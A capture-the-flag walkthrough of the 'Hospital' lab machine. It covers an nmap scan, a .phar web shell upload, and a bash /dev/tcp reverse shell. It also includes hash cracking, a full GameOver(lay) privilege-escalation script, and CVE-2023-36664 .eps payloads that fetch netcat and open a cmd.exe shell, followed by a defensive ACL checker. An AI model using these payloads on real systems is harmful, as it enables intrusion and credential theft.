🏥

Hospital

 
22,53,88,135,139,389,443,445,464,593,636,1801,2103,2105,2107,2179,3268,3269,3389,5985,6062,6404,6406,6407,6409,6613,6633,8080,9389
PORT      STATE SERVICE           VERSION
22/tcp    open  ssh               OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 e14b4b3a6d18666939f7aa74b3160aaa (ECDSA)
|_  256 96c1dcd8972095e7015f20a24361cbca (ED25519)
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-01-04 17:18:47Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
443/tcp   open  ssl/http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| tls-alpn:
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
1801/tcp  open  msmq?
2103/tcp  open  msrpc             Microsoft Windows RPC
2105/tcp  open  msrpc             Microsoft Windows RPC
2107/tcp  open  msrpc             Microsoft Windows RPC
2179/tcp  open  vmrdp?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3269/tcp  open  globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3389/tcp  open  ms-wbt-server     Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Not valid before: 2023-09-05T18:39:34
|_Not valid after:  2024-03-06T18:39:34
| rdp-ntlm-info:
|   Target_Name: HOSPITAL
|   NetBIOS_Domain_Name: HOSPITAL
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: hospital.htb
|   DNS_Computer_Name: DC.hospital.htb
|   DNS_Tree_Name: hospital.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2024-01-04T17:19:45+00:00
5985/tcp  open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6062/tcp  open  msrpc             Microsoft Windows RPC
6404/tcp  open  msrpc             Microsoft Windows RPC
6406/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
6407/tcp  open  msrpc             Microsoft Windows RPC
6409/tcp  open  msrpc             Microsoft Windows RPC
6613/tcp  open  msrpc             Microsoft Windows RPC
6633/tcp  open  msrpc             Microsoft Windows RPC
8080/tcp  open  http              Apache httpd 2.4.55 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.55 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
9389/tcp  open  mc-nmf            .NET Message Framing
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 5.X|4.X (92%)
OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4
Aggressive OS guesses: Linux 5.0 (92%), Linux 4.15 - 5.6 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
|_clock-skew: mean: 6h59m40s, deviation: 0s, median: 6h59m40s
| smb2-time:
|   date: 2024-01-04T17:19:47
|_  start_date: N/A
dc.hospital.htb.    3600    IN    A    192.168.5.1
dc.hospital.htb.    3600    IN    A    10.129.40.246
hospital.htb.       600     IN    A    10.129.40.246
hospital.htb.       600     IN    A    192.168.5.1
 
Register an account on the web app on port 8080:
ivan:123456
Web shell used: p0wny-shell (flozz's GitHub project)
Upload pwn.phar, then use gobuster to find the uploads path.
Sent a reverse shell:
/usr/bin/bash -c "bash -i >& /dev/tcp/10.10.14.32/1234 0>&1"
Database credentials in the web app config:
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'my$qls3rv1c3!');
define('DB_NAME', 'hospital');
Connect to MySQL:
admin:$2y$10$caGIEbf9DBF7ddlByqCkrexkt0cPseJJ5FiVO1cnhG.3NLrxcjMh2
patient:$2y$10$a.lNstD7JdiNYxEepKf1/OZ5EM5wngYrf.m5RxXCgSud7MVU6/tgO
These are bcrypt hashes; crack them with hashcat:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt --user
admin:123456
Nothing found; maybe it was registered by other players.
It's Ubuntu 23.04.
Used the CVE-2023-2640 / CVE-2023-32629 (GameOver(lay)) privilege escalation script by g1vi:
#!/bin/bash
# CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation
# by g1vi https://github.com/g1vi
# October 2023

echo "[+] You should be root now"
echo "[+] Type 'exit' to finish and leave the house cleaned"

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
Got root this way.
Got the hash from /etc/passwd:
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::
Cracked with john:
drwilliams:qwe123!@#
Login to the webmail succeeded with these credentials.
Build the .eps file with the CVE-2023-36664 exploit script:
python3 CVE_2023_36664_exploit.py --inject --payload "curl 10.10.14.32:8000/nc64.exe -o nc.exe" --filename file.eps
python3 CVE_2023_36664_exploit.py --inject --payload "nc.exe 10.10.14.32 4444 -e cmd.exe" --filename file.eps
Send the .eps file to the contact.
rpcclient hospital.htb -U drbrown
querydispinfo
PS C:\xampp> icacls htdocs
htdocs NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F)
       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
       BUILTIN\Administrators:(I)(OI)(CI)(F)
       BUILTIN\Users:(I)(OI)(CI)(RX)
       BUILTIN\Users:(I)(CI)(AD)
       BUILTIN\Users:(I)(CI)(WD)
       CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
XAMPP runs with the privileges of NT AUTHORITY\SYSTEM, and BUILTIN\Users can create files (AD, WD) under htdocs.
cd C:\xampp\htdocs
Upload the p0wny-shell to this folder, then access it.
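The root cause of the last step is the ACL on the web root: a low-privilege group can write into a directory served by a SYSTEM-level process. As an added defender-side check (not part of the original writeup), the script below parses icacls output and flags write-capable ACEs granted to broad groups; the sample output is the htdocs listing transcribed from above, and the function names and the rights/principal tables are my own choices.

```python
import re

# Constructed sample: the icacls output for C:\xampp\htdocs from the writeup,
# one ACE per line the way icacls prints it.
SAMPLE_ICACLS = """\
htdocs NT AUTHORITY\\LOCAL SERVICE:(OI)(CI)(F)
       NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
       BUILTIN\\Administrators:(I)(OI)(CI)(F)
       BUILTIN\\Users:(I)(OI)(CI)(RX)
       BUILTIN\\Users:(I)(CI)(AD)
       BUILTIN\\Users:(I)(CI)(WD)
       CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# icacls rights that let a principal create or modify content (simple and specific forms).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}
# Low-privilege principals: a write ACE for these on a web root is a finding.
BROAD_PRINCIPALS = {"BUILTIN\\Users", "Everyone",
                    "NT AUTHORITY\\Authenticated Users", "NT AUTHORITY\\INTERACTIVE"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}


def parse_icacls(output, target):
    """Return (principal, rights, inheritance flags) for each ACE of one icacls target."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if not line or ":" not in line or line.startswith("Successfully"):
            continue
        lhs, rhs = line.rsplit(":", 1)          # principal may itself contain spaces
        if lhs.startswith(target + " "):         # first line carries the path before the ACE
            lhs = lhs[len(target) + 1:].strip()
        tokens = [t for grp in re.findall(r"\(([^)]*)\)", rhs) for t in grp.split(",")]
        flags = {t for t in tokens if t in INHERIT_FLAGS}
        rights = {t for t in tokens if t not in INHERIT_FLAGS}
        aces.append((lhs, rights, flags))
    return aces


def writable_by_low_priv(output, target):
    """List (principal, sorted write rights) where a broad group can write into the target."""
    return [(p, sorted(r & WRITE_RIGHTS)) for p, r, _ in parse_icacls(output, target)
            if p in BROAD_PRINCIPALS and r & WRITE_RIGHTS]


if __name__ == "__main__":
    for principal, rights in writable_by_low_priv(SAMPLE_ICACLS, "htdocs"):
        print(f"[!] {principal} can write to htdocs via {','.join(rights)}")
```

Run against the real listing with `icacls C:\xampp\htdocs` piped into a file; any hit means the web root must be re-ACLed or the service moved off SYSTEM.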
Done!